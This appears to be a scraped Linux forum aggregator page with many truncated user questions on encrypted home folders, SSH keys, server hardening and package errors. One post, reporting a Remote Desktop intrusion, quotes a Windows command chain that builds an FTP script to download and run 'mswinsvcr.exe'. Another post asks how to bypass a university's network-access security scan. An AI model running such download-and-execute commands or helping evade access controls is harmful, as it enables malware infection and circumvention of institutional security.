Ubuntu Security :: UNABLE - Access Private Data Desktop
Oct 12, 2010
I have a seperate partition for my "/home" folder. Whenever I install a new distro I format my "/" folder.
This way I was able to access my old home data files since I install using a different username. Everything worked fine until last Sunday.
10.10, unlike other versions of ubuntu, has encrypted my old username in my home folder.
Then using this document [url]
I was able to mount my hard drive again. But all the file and folder names are like this.
Btw I don't remember selecting an option to encrypt my old home directory in the first place, what is this ?
View 2 Replies
ADVERTISEMENT
Jan 7, 2011
Since recently I have installed windows (dont worry I will be back to ubuntu soon enough but I've ran into some trouble), I had installed windows on my main hard disk (I couldn't install windows on my 2nd hard disk for some reason).
There were 2 partitions on the main hard disk, 1 which had all my data and another which had all the system fyles for ubuntu on it I believe.
Now I deleted the small system fyle partition and installed windows over it thinking I'd have all my data on the other partition when I needed.
But when I started up ubuntu with a live USB (I had made it prior to deinstalling ubuntu because I wanted to go back asap) and browsed my files, I noticed that I couldn't get to my private data anymore!
The /home/user partition is still there but it only has a file in it which says something like "recover-private-data.desktop" but when I double click it (made it executable) it just pops up a terminal real fast and disappears.
View 3 Replies
View Related
Aug 18, 2010
i noticed that all files can be seen by another computer if the drive is accessed
can I stop this? can i set a private folder?
View 7 Replies
View Related
Feb 9, 2011
I'm running a program called Synergy+ to let my keyboard and mouse control multiple computers. One of Synergy+'s features is that clipboard (copy-paste) data is able to be shared, as in copy on one machine, paste onto another. I would like this functionality removed but Synergy+ has no way to disable it. I'm looking for any ideas to block clipboard data from being transferred. Is there a way to block a program from accessing the machine's clipboard data?
View 5 Replies
View Related
Mar 15, 2010
I had 2 accounts on a single system. Other users are able to see my data. how to stop other users to access my personal data.
View 8 Replies
View Related
Jun 30, 2010
I'm about to have a web server at home for the first time. I've always missed having full control and not having to contact my hosting company when I need to do some specific changes - and some changes they won't do for you at all.I've chosen the non-GUI Ubuntu Server with LAMP, and nothing more is installed really except for a couple of command line tools from the repository. The LAMP software has been locked down as good as I can by following some guides on the net and using common sense. Like Apache 2 don't have access to the file system except for the www folder, and setting the headers to Prod. MySQL has skip-networking and I've commented out the listen string to localhost. PHP has a truckload of functions that I've disabled in the php.ini, also by following some guides on the net, among some other security enhancing php.ini editing.
The only thing the server will serve is a well known PHP forum and some html docs, and that's all. Nothing advanced or complicated stuff, and I'm definitely not programming PHP myself or letting anyone do it for me.But I do want to sleep well at night knowing that my server is always on and sitting on the edge of my home network! And can I do that? I've heard that you don't need to be worried about getting your Linux server box hacked, but you should be worried about anyone getting root access to it. But is it really that simple? Ubuntu is shipped without root account and you must have the sudo password, right? What's the odds for anyone to get full access to my system?An issue: I've heard that Apache never must run as root. When I do a ps -ef, I see that there are several www-data processes running apache, but there's one root process running apache too. Is this normal and is it safe?An issue: I've heard that PHP can fail pretty easily. But isn't PHP running under apache 2 and limited by the www-data filesystem access?An issue: MySQL is running as a MySQL user, and I guess that's an unprivileged user right?
View 9 Replies
View Related
May 6, 2010
I need to be able to decrypt data, like simple text files, that have been encrypted and base64 encoded with my public key.I need to use openssl so i do:
Code:
$cat encrypted | openssl enc -base64 -d > ./answer.txt
and i get exactly the same data as before the command was run. Am i right in thinking that i need to decode before decrypting? I tried decrypting, before i realized that i had to decode first,using this command:
[Code]...
View 5 Replies
View Related
Jul 2, 2010
Iam using snmp to access the remote system data.But according to the requirement iam encoding the snmp request data to OAMPDU packet format and sending to remote system.the remote system receives the OAMPDU packet,decodes it and is sending the snmp packet to snmp agent through UDP socket which is bind to port 161.but iam unable to receive the response from snmp agent.i have created a udp socket which is bind to 161 port to receive the response.
if i use any other free port number other than 161 for receiving snmp agent is not sending the response to that port.can any one please suggest me how to overcome this problem.Can we configure the different ports for tx,rx ?How do we know on which port does snmp sends the response ???
View 1 Replies
View Related
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
View 1 Replies
View Related
Aug 8, 2010
When I am installing texlive package power gone suddenly. From that time onwards yum update command is not working. It is giving error as follows:
Loaded plugins: presto, refresh-packagekit, security [URL]: [Errno 14] HTTP Error 404 : [URL]
Trying other mirror.
Skipping security plugin, no data
Setting up Update Process
Resolving Dependencies
Skipping security plugin, no data
--> Running transaction check
--> Processing Dependency: libkpathsea.so.4 for package: evince-dvi-2.30.3-1.fc13.i686
---> Package texlive-kpathsea-doc.noarch 0:2010-8.svn19287.fc13 set to be updated
--> Finished Dependency Resolution
Error: Package: evince-dvi-2.30.3-1.fc13.i686 (@updates)
Requires: libkpathsea.so.4
Removing: kpathsea-2007-51.fc13.i686 (@updates)
Available: kpathsea-2007-49.fc13.i686 (fedora)
You could try using --skip-broken to work around the problem
You could try running: rpm -Va --nofiles --nodigest
I already tried this commands but again I have problem:
yum-complete-transaction first
rpm -e texlive
yum install libkpathsea.so.4
View 2 Replies
View Related
Dec 30, 2010
host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Apr 16, 2010
For the past few weeks my system has been exhibiting some strange behavior. The first of these instances has been in the form of a total system lockup necessitating a power cycle -- ie. no kernel panic or oops, but cessation of all on-screen activity and an unresponsive mouse and keyboard. ( The first lockup occurred when the monitor was powered down)
Just a few days ago, I started noticing something else : Launching Firefox (3.6.4pre) resulted in it locking up near start-up especially if I was logged into Gmail. After that I experienced a total system lockup and then another one which has placed me in the situation as suggested in the title.
Specifically, KDM and the KDM login manager will start-up and I will be allowed to type my password. Immediately after that when the first of the icons in the KDE start-up animation starts to come into focus the screen goes black and I am returned to the KDM login manager -- I can enter my password again and continue this process ad infinitum.
Trying to diagnose the issue, I attached GDB to KDM. It seems that after I enter my password one or more of the KDE start-up processes dies with signal 1 or to be more specific :
Code:
Program received signal SIGUSR1, User defined signal 1.
0x00007f4ae742d3c3 in select () from /lib/libc.so.6
(gdb) bt full
[code]...
View 3 Replies
View Related
Jan 25, 2011
One of my clients is considering implementing GPG or a similar technology to encrypt internal emails. (They have a different system in place already for external mail.) I've done some reading on the subject but can't seem to find any information about how one might set up a keyserver. All the discussions I've seen so far talk about uploading the public keys to a server like keyserverDoes anyone know what software packages might be used to set up our own private keyserver on a Linux machine?
View 2 Replies
View Related
Jan 14, 2010
Earlier when installing Karmic I requested assistance to enable me to listen & view BBC content in the United Kingdom. This involved me in loading :
mozilla-mplayer,
flashplugin-nonfree,
Ubuntu restricted extras
which worked a treat.
I decided to install Karmic on an old desktop system with the intent of using it as a backup system for my data. Having installed this as a fresh install I again followed the earlier advice only to find that when I attempted to connect to the BBC I was asked to load flash. This happened no matter which station I attempted to listen or view.
As far as I can see everything has been installed exactly as on my laptop and therefore should naturally work as before. The only difference is the laptop is using 64 bit and the desktop 32. Since I now see that the desktop is also capable of 64 bit processing should installing the 64 bit Karmic help?
Using sysinfo does not give too much information. I am told that the CPU is an AMD Athlon 64x2 Dual Core processor 4400+, 1000.000 MHz & L2 cache 512. The graphic card is shown as VGA Compatible Controller and the Sound Card as a multimedia Audio Controller.
I am at a loss why I am being asked for flash on the desktop and not being able to have the same benefits as I have on my laptop running the same OS.
View 9 Replies
View Related
Mar 12, 2010
To start off I do not have the ability to post in the Networking/Wireless thread. I attend DeVry university and in my school they recently rolled out "Bluesocket." Now that they have done this I am not able to access the internet utilizing my ubuntu laptop.I am able to connect to the network. When I open my web browser I am redirected to the "bluesocket" login page where I am able to successfully log in. The next step to accessing DeVry's internet service is to allow Bluesocket to do a scan using a Java applet. That scan is successful.
The results of the scan inform me that I am not being allowed to access the network resources because I don't have an antivirus or firewall program installed on my computer. I do not wish to have an antivirus or firewall program installed on my laptop to utilize DeVry's network resources. My question is what steps do I need to take to bypass/trick bluesocket?
View 7 Replies
View Related
Apr 17, 2011
Some people have said that it's dumb to use the same key for multiple things, but for curiosity's sake, is it possible to convert one's private key to id_rsa? I know that I can convert my public key to id_rsa.pub with ``$ gpgkey2ssh [key ID] >id_rsa.pub'', and that makes me think that there should be a way to do it with my private key.
View 1 Replies
View Related
Mar 18, 2011
When you install sshd and run it with no modifications, then any other machine can connect to your machine without specifying a key. How does this work? Some key is being used, correct? how does the client know what private key to use?
View 14 Replies
View Related
Mar 26, 2010
At the moment we have one SSH server with the private key being on a usb flash drive, and the public key being on the server in authorized_keys2. Now that three more servers are coming online, should we generate new keys, so we have muliple private and public keys (one pair for each server), or use the same two keys to access all the servers
View 5 Replies
View Related
Oct 12, 2010
I am trying to use puttygen to create a ppk file that I can use with putty. I try to import the private key and it gives me the error: Couldn't load private key (ciphers other than DES-EDE3-CBC not supported). Now I obviously know this is telling me that I have the wrong cipher, but what what do I do to use the correct one? Here are the instructions that I used to create the keys.
Also, when I open the key this is the top:
- BEGIN RSA PRIVATE KEY -
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC
and then some other stuff that I don't think I should share. But the weird thing (to me atleast) is that it lists CBC right at the top there which is what puttygen wants. Why won't it accept it?
View 2 Replies
View Related
Aug 8, 2011
I'm a absolute "server- noob" but I've got some experienced with desktop linux and want to build my own file server to access my stuff over the internet. I'm using dropbox for a while now like a cloud drive by simply mounting the "private" folder (which I encrypted with encfs/BoxCrypt) in order to cross-platform use important files. The problem is that Dropbox only provides 2 GB for free and I don't know how secure my data is up there. Moreover I don't wanna always sync all files locally.
I got an intel atom machine standing around and so I want to build my own file server to provide the same or at least a similar service.
1. Which type of server application provides a "network drive" that computers (several users) from the internet can access?
2. What's the best way to encrypt my data and transmission in order to make the system absolutely unattackable/unreadable from outside?
3. Is there a service that can provide a dropbox-style sync mechanism?
4. Which distro should I use? I'd prefer a non-desktop enviroment solution but never had anything to do with it. Is that possible for an average linux user?
I'm aware that this solution won't be very fast because of the limited upload of a standard internet connection but that would be ok! It's more that I want to have the possibiltiy to access all my data as a thin-client anywhere, anytime on any machine and still be on the safe side. I know that this is some kind of contradiction but what would be the best compromise? I know some questions may sound stupid but I really never had anything to do with servers at all in the past...
View 3 Replies
View Related
Dec 19, 2010
I made a Desktop User account. When I went on that account, it allowed me to execute sudo as if I was an administrator. I don't know what might be causing this. I do have ufw set up and blocking incoming connections. Do you guys know what might be at the root of this?Also, when I used sudo from the user account (which I shouldn't have been able to do), I provided the password for my admin account.
View 9 Replies
View Related
Jan 18, 2011
I have recently installed Ubuntu 10.10 desktop edition in my system. I am unable to access wired internet services after establishing the connection.
View 4 Replies
View Related
Dec 10, 2010
Long story short: I opted to encrypt my home, enter the passphrase and soon as I log out and rebooted, I got stuck with a message about /var/lib/ICEauthority file and other messages. So I've been trying to fix one issue at the time. The bottom line is that I'm trying to get to my private folder. Dropped in recovery mode:
[Code]...
View 3 Replies
View Related
Feb 18, 2010
In my ~/.ssh I have a number of public keys and one private key (id_rsa). How can I verify which one makes a pair with the private one.Or, can one generate the public one from the private key (in reasonable time)?
View 4 Replies
View Related
Mar 1, 2011
Last week I installed Ubuntu 10.10 on my system in dual booting. I had installed succesfully both but unable to see data files from windows OS. Though I have excercised the options in various resources available on internet/blogs. System takes about 03 hrs during installation process. I am also unable to configure Thunderbird.
System hardware info is as -
System ManufacturerVIA Technologies, Inc.
System ModelKM266APro-835
System TypeX86-based PC
[code]....
View 8 Replies
View Related
Sep 17, 2010
I'm running Karmic Koala on my laptop and I'm attempting to connect to my university's secure wireless network. I was directed here by the university's computer help websiteI've followed all the steps, but when I open the wireless network authentication applet and try to browse to my private key, I can't find it. The "chose your private key" window claims to be looking for "DER, PEM, or PKCS#12 private keys (*.der, *.pem, *.p12)," and while my private key file shows up as a .p12 file when I open that location with my file browser, the file doesn't show up when I try and browse to it from the authentication applet. I've attached an image which shows the file in one window, but not in the other f clarification.
View 7 Replies
View Related
May 15, 2011
a friend of mine is doing a small website-project in school (group of ~6 people). They want to use git as VCS and need acces to a server. I have an account on the server from university, but - of course - no root access.
I could create private/public keys for them, to SSH into my account, but I don't want them to have this power I found 'git-shell', which seems to be used for restricted access with git (although I'm not sure whether I understood the functionality).
My question is: Is it possible to configure SSH keys in that way, that the server runs them (and only them) in git-shell in a specified directory (using ~/.ssh/{config,authorized_keys})?
So that they can
- log in with their SSH key
- use git, execute scripts etc.
- use git push/pull from their private+school PC
- work only in a specific directory (like chroot) eg. ~/web-project/
[Code]...
View 2 Replies
View Related
Apr 6, 2010
I need to install Trac on a server that's on a private development VLAN (no internet access). Obviously Trac needs to go out over the internet to download/install various things. Does anyone know of an RPM or tarball out there that I can use to install Trac without being connected to the net?
View 2 Replies
View Related
Feb 19, 2011
We purchased a new database system at work last October, ditching the old system because of a lack of support from the vendor. This is a retail Point of Sale and Backoffice database system. I am not sure what system the new one runs on, but the system we replaced was a Firebird data base. The reason I am posting is because we are now in need of the information contained in the old database which was not completely imported into the new system.
Basically the problem is this: The database in on a Windows XP system and I found a copy of SQL Manager Lite 2008 on the system, which after quite a bit of studying, I figured out how to extract the database into a removable file. I have this file (178MB) on a USB stick in a file called Backoffice.fbd.
My studying suggests to me that I can get into this database with MySQL. I have never used this and have no clue how to do this. All I want to be able to do get into the database and create tab deliminated spreadsheet files for each of the database sections (Customers, Repairs, Sales History, stock files, etc.) Is it possible to do this with Ubuntu and MySQL and if so, can expert suggest one or two things to get me started. While a guided tutorial would be nice because I am not an expert, I am willing to learn on my own if someone could point me in the right direction.
View 3 Replies
View Related
